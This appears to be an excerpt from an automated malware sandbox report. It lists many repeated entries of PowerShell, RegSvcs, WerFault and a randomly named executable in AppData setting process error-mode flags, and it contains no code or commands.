                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess information set: NOOPENFILEERRORBOX
